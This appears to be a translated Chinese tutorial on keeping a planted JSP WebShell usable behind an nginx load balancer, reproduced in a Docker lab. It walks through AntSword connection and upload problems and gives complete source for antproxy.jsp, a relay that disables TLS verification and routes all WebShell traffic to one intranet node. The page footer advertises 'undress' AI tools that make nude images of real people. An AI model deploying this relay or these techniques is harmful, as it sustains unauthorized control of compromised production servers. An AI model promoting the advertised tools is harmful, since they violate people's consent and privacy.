Scenario description

Assume that a real production environment has an RCE vulnerability that lets us plant a WebShell.

First, pull the vulnerable environment from GitHub. Before setting up the image, install nginx and Tomcat on CentOS and prepare their configuration files. Then use Docker to pull the image and reproduce the vulnerability.

1. Set up the docker environment first

2. Test whether Tomcat is accessible

As the picture above shows, the back-end Tomcat is accessible

3. Check the load-balancing configuration of the nginx reverse proxy in Docker

4. Check the ant.jsp file on lbsnode1 in Docker

This file is essentially a one-line WebShell (a "one-sentence Trojan"), and the same file also exists on lbsnode2

lbsnode1:

lbsnode2:

5. Connect to ant.jsp with AntSword (China Ant Sword)

Because both nodes have ant.jsp at the same path, the connection works without errors

Reproduction process

Existing problems



Question 1: Because the nginx reverse proxy uses round-robin (polling) load balancing, an uploaded file must exist at the same location on both back-end servers

Because uploads go through a load-balancing reverse proxy, an uploaded file lands on only one back-end server; the other server does not have it. Whenever a request is routed to the server without the file, a 404 error is returned. This is why access works one moment and fails the next.
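The alternating success and 404 pattern can be illustrated with a small offline simulation. This is only a sketch under assumptions: the class name `RoundRobinUploadDemo`, the path `/tool.jsp`, and the strict two-node alternation are hypothetical and stand in for whatever the real nginx upstream does. No network traffic is involved.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

final class RoundRobinUploadDemo {
    // Simulates `requests` consecutive requests for `path` under strict round robin.
    // Each node is modelled as the set of paths it holds (a hypothetical stand-in
    // for a back-end web root). Returns the status each request would see.
    static List<Integer> statuses(List<Set<String>> nodes, String path, int requests) {
        List<Integer> result = new ArrayList<>();
        for (int i = 0; i < requests; i++) {
            Set<String> files = nodes.get(i % nodes.size()); // next node in rotation
            result.add(files.contains(path) ? 200 : 404);
        }
        return result;
    }

    public static void main(String[] args) {
        // Assumption: /tool.jsp reached only the first node, /ant.jsp exists on both.
        List<Set<String>> nodes = List.of(
                Set.of("/ant.jsp", "/tool.jsp"),
                Set.of("/ant.jsp"));
        System.out.println(statuses(nodes, "/tool.jsp", 4)); // [200, 404, 200, 404]
        System.out.println(statuses(nodes, "/ant.jsp", 4));  // [200, 200, 200, 200]
    }
}
```

A file present on every node always answers with 200, which is the point of the solution described next.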

Solution:

We need to upload a WebShell with identical content to the same location on every node, so that it is reachable no matter which back-end server a request is routed to. To get the file onto every back-end server, you have to upload it over and over until each node has a copy.

Question 2: When we execute a command, we cannot know which machine will handle the next request

Running hostname -i to see which machine executed the command shows that the IP address keeps drifting

Question 3: When we upload larger tools, they end up unusable

When uploading a larger file, AntSword uses chunked upload: it splits the file across multiple HTTP requests sent to the target. Under load balancing, part of the content lands on server A and the rest on server B, so the file is corrupted and larger tools or files cannot be opened or used
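Why a chunked upload ends up corrupted can be shown with another offline sketch. The class name `ChunkedUploadDemo`, the chunk contents, and the assumption that each chunk is appended to a file on whichever node receives it are all hypothetical; AntSword's actual chunking protocol is not modelled here.

```java
import java.util.ArrayList;
import java.util.List;

final class ChunkedUploadDemo {
    // Sends each chunk as a separate request under strict round robin and
    // returns what each node has accumulated at the end.
    static List<String> distribute(List<String> chunks, int nodeCount) {
        List<StringBuilder> nodes = new ArrayList<>();
        for (int n = 0; n < nodeCount; n++) {
            nodes.add(new StringBuilder());
        }
        for (int i = 0; i < chunks.size(); i++) {
            nodes.get(i % nodeCount).append(chunks.get(i)); // chunk i lands on node i mod N
        }
        List<String> result = new ArrayList<>();
        for (StringBuilder sb : nodes) {
            result.add(sb.toString());
        }
        return result;
    }

    public static void main(String[] args) {
        // The original file is "AABBCCDD"; neither node ends up with it intact.
        System.out.println(distribute(List.of("AA", "BB", "CC", "DD"), 2)); // [AACC, BBDD]
    }
}
```

With a single node the chunks reassemble correctly, which is why the problem only appears behind the load balancer.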

Question 4: Because the target host cannot reach the Internet, going further requires an HTTP tunnel such as reGeorg/HTTPAbs, but in this scenario all of these tunnel scripts fail.

Solution

Option 1: Shut down one of the back-end servers

Shutting down one of the back-end servers does solve the four problems above, but it is reckless (as the saying goes, "the God of Longevity hanging himself: tired of living"): it disrupts the business and invites disaster. Rejected without further consideration.

Overall assessment: Never try this in a real environment!

Option 2: Check whether to run before executing

Since we cannot predict which machine will handle the next request, our shell can simply check whether it should run before executing the payload.

First, create a script named demo.sh. The script obtains the address of the current back-end server and runs the program only when that address matches the server we chose. If the address belongs to the other server, the program is not run.

Upload demo.sh to both back-end servers through AntSword (China Ant Sword). Because of load balancing, you need to upload repeatedly until both nodes have it.

This does ensure that commands run on the machine we want. However, executing commands this way is inelegant, and problems such as large file uploads and HTTP tunnels remain unsolved.

Overall assessment: This option is barely usable, suitable only for executing commands, and not elegant enough.

Option 3: Forward HTTP traffic in the Web layer (key point)

We cannot reach the intranet IP of LBSNode1 (172.23.0.2) directly with AntSword, but other machines can. Besides nginx, the LBSNode2 machine can also reach port 8080 on Node1.

Remember the "PHP Bypass Disable Function" plug-in? After the .so was loaded in that plug-in, we started an HTTP server locally and then used the HTTP-level traffic forwarding script "antproxy.php". Let's apply the same idea to this scenario:

Let's walk through the picture step by step. Our goal is for every data packet to reach the machine "LBSNode 1"

In step 1, we request /antproxy.jsp. This request is sent to nginx.

After nginx receives the packet, there are two possible cases:

Look at the black line first. In step 2, the request is passed to the Node1 machine and reaches /antproxy.jsp there. In step 3, /antproxy.jsp reassembles the request and passes it to /ant.jsp on Node1, where it executes successfully.

Now look at the red line. In step 2, the request is passed to the Node2 machine. In step 3, /antproxy.jsp on Node2 reassembles the request and passes it to /ant.jsp on Node1, where it executes successfully.
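The two paths can be summarised with a small offline model. It is a sketch only: the class name `ForwardingDemo` and the labels `node1` and `node2` are hypothetical, and the forwarding step is reduced to "always hand the request to the fixed target". No requests are sent.

```java
import java.util.ArrayList;
import java.util.List;

final class ForwardingDemo {
    // Hypothetical labels for the two back ends behind nginx.
    static final List<String> NODES = List.of("node1", "node2");
    // The fixed node that the forwarding script points at.
    static final String TARGET = "node1";

    // Returns which node ends up executing each of `requests` consecutive requests.
    // Without forwarding, the entry node chosen by round robin executes the request;
    // with forwarding, every entry node hands the request on to TARGET.
    static List<String> executingNodes(int requests, boolean viaProxy) {
        List<String> result = new ArrayList<>();
        for (int i = 0; i < requests; i++) {
            String entry = NODES.get(i % NODES.size());
            result.add(viaProxy ? TARGET : entry);
        }
        return result;
    }

    public static void main(String[] args) {
        System.out.println(executingNodes(4, false)); // [node1, node2, node1, node2]
        System.out.println(executingNodes(4, true));  // [node1, node1, node1, node1]
    }
}
```

Both the black and the red path end on the same node, so the executing host no longer depends on how nginx routes the request.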

1. Create the antproxy.jsp script

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
    public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }

    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            public X509Certificate[] getAcceptedIssuers() {
                return null;
            }

            @Override
            public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }

            @Override
            public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
        } };
        try {
            SSLContext sc = SSLContext.getInstance("TLS");
            sc.init(null, trustAllCerts, new java.security.SecureRandom());
            HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        } catch (KeyManagementException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
%>
<%
    String target = "http://172.24.0.2:8080/ant.jsp";
    URL url = new URL(target);
    if ("https".equalsIgnoreCase(url.getProtocol())) {
        ignoreSsl();
    }
    HttpURLConnection conn = (HttpURLConnection)url.openConnection();
    StringBuilder sb = new StringBuilder();
    conn.setRequestMethod(request.getMethod());
    conn.setConnectTimeout(30000);
    conn.setDoOutput(true);
    conn.setDoInput(true);
    conn.setInstanceFollowRedirects(false);
    conn.connect();
    ByteArrayOutputStream baos=new ByteArrayOutputStream();
    OutputStream out2 = conn.getOutputStream();
    DataInputStream in=new DataInputStream(request.getInputStream());
    byte[] buf = new byte[1024];
    int len = 0;
    while ((len = in.read(buf)) != -1) {
        baos.write(buf, 0, len);
    }
    baos.flush();
    baos.writeTo(out2);
    baos.close();
    InputStream inputStream = conn.getInputStream();
    OutputStream out3=response.getOutputStream();
    int len2 = 0;
    while ((len2 = inputStream.read(buf)) != -1) {
        out3.write(buf, 0, len2);
    }
    out3.flush();
    out3.close();
%>

2. Modify the forwarding address so that it points to the target script's access address on the intranet IP of the target Node.

Note: This is not limited to a WebShell; the access address of reGeorg and other scripts can be used as the target as well

Here we target ant.jsp on LBSNode1

Note:

a) Do not use the upload function. It uploads in chunks, which scatters the pieces across different Nodes.

b) antproxy.jsp must exist at the same path on every Node, so I saved it many times to make sure each node received the script

3. Modify the Shell configuration: set the URL to the address of antproxy.jsp and leave the other settings unchanged

4. Test command execution and check the IP

Advantages of this solution:

1. It works with low privileges. With high privileges you could also forward directly at the port level, but that is no different from shutting down a service as in Option 1.

2. In terms of traffic, it only affects requests to the WebShell; other normal business requests are unaffected.

3. It is compatible with more tools.

Disadvantages:

This solution requires intranet connectivity between the "target Node" and the "other Node". If they cannot reach each other, it fails.

内存飙升!记一次nginx拦截爬虫Mar 30, 2023 pm 04:35 PM

内存飙升!记一次nginx拦截爬虫Mar 30, 2023 pm 04:35 PM本篇文章给大家带来了关于nginx的相关知识,其中主要介绍了nginx拦截爬虫相关的,感兴趣的朋友下面一起来看一下吧,希望对大家有帮助。

nginx限流模块源码分析May 11, 2023 pm 06:16 PM

nginx限流模块源码分析May 11, 2023 pm 06:16 PM高并发系统有三把利器:缓存、降级和限流;限流的目的是通过对并发访问/请求进行限速来保护系统,一旦达到限制速率则可以拒绝服务(定向到错误页)、排队等待(秒杀)、降级(返回兜底数据或默认数据);高并发系统常见的限流有:限制总并发数(数据库连接池)、限制瞬时并发数(如nginx的limit_conn模块,用来限制瞬时并发连接数)、限制时间窗口内的平均速率(nginx的limit_req模块,用来限制每秒的平均速率);另外还可以根据网络连接数、网络流量、cpu或内存负载等来限流。1.限流算法最简单粗暴的

nginx+rsync+inotify怎么配置实现负载均衡May 11, 2023 pm 03:37 PM

nginx+rsync+inotify怎么配置实现负载均衡May 11, 2023 pm 03:37 PM实验环境前端nginx:ip192.168.6.242,对后端的wordpress网站做反向代理实现复杂均衡后端nginx:ip192.168.6.36,192.168.6.205都部署wordpress,并使用相同的数据库1、在后端的两个wordpress上配置rsync+inotify,两服务器都开启rsync服务,并且通过inotify分别向对方同步数据下面配置192.168.6.205这台服务器vim/etc/rsyncd.confuid=nginxgid=nginxport=873ho

如何解决跨域?常见解决方案浅析Apr 25, 2023 pm 07:57 PM

如何解决跨域?常见解决方案浅析Apr 25, 2023 pm 07:57 PM跨域是开发中经常会遇到的一个场景,也是面试中经常会讨论的一个问题。掌握常见的跨域解决方案及其背后的原理,不仅可以提高我们的开发效率,还能在面试中表现的更加

nginx php403错误怎么解决Nov 23, 2022 am 09:59 AM

nginx php403错误怎么解决Nov 23, 2022 am 09:59 AMnginx php403错误的解决办法:1、修改文件权限或开启selinux;2、修改php-fpm.conf,加入需要的文件扩展名;3、修改php.ini内容为“cgi.fix_pathinfo = 0”;4、重启php-fpm即可。

nginx部署react刷新404怎么办Jan 03, 2023 pm 01:41 PM

nginx部署react刷新404怎么办Jan 03, 2023 pm 01:41 PMnginx部署react刷新404的解决办法:1、修改Nginx配置为“server {listen 80;server_name https://www.xxx.com;location / {root xxx;index index.html index.htm;...}”;2、刷新路由,按当前路径去nginx加载页面即可。

nginx怎么禁止访问phpNov 22, 2022 am 09:52 AM

nginx怎么禁止访问phpNov 22, 2022 am 09:52 AMnginx禁止访问php的方法:1、配置nginx,禁止解析指定目录下的指定程序;2、将“location ~^/images/.*\.(php|php5|sh|pl|py)${deny all...}”语句放置在server标签内即可。



Linux系统下如何为Nginx安装多版本PHPMay 11, 2023 pm 07:34 PM

Linux系统下如何为Nginx安装多版本PHPMay 11, 2023 pm 07:34 PMlinux版本:64位centos6.4nginx版本:nginx1.8.0php版本:php5.5.28&php5.4.44注意假如php5.5是主版本已经安装在/usr/local/php目录下,那么再安装其他版本的php再指定不同安装目录即可。安装php#wgethttp://cn2.php.net/get/php-5.4.44.tar.gz/from/this/mirror#tarzxvfphp-5.4.44.tar.gz#cdphp-5.4.44#./configure--pr

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

Hot Tools

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software

SublimeText3 Mac version

God-level code editing software (SublimeText3)

PhpStorm Mac version

The latest (2018.2.1) professional PHP integrated development tool

Safe Exam Browser

Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.

Zend Studio 13.0.1

Powerful PHP integrated development environment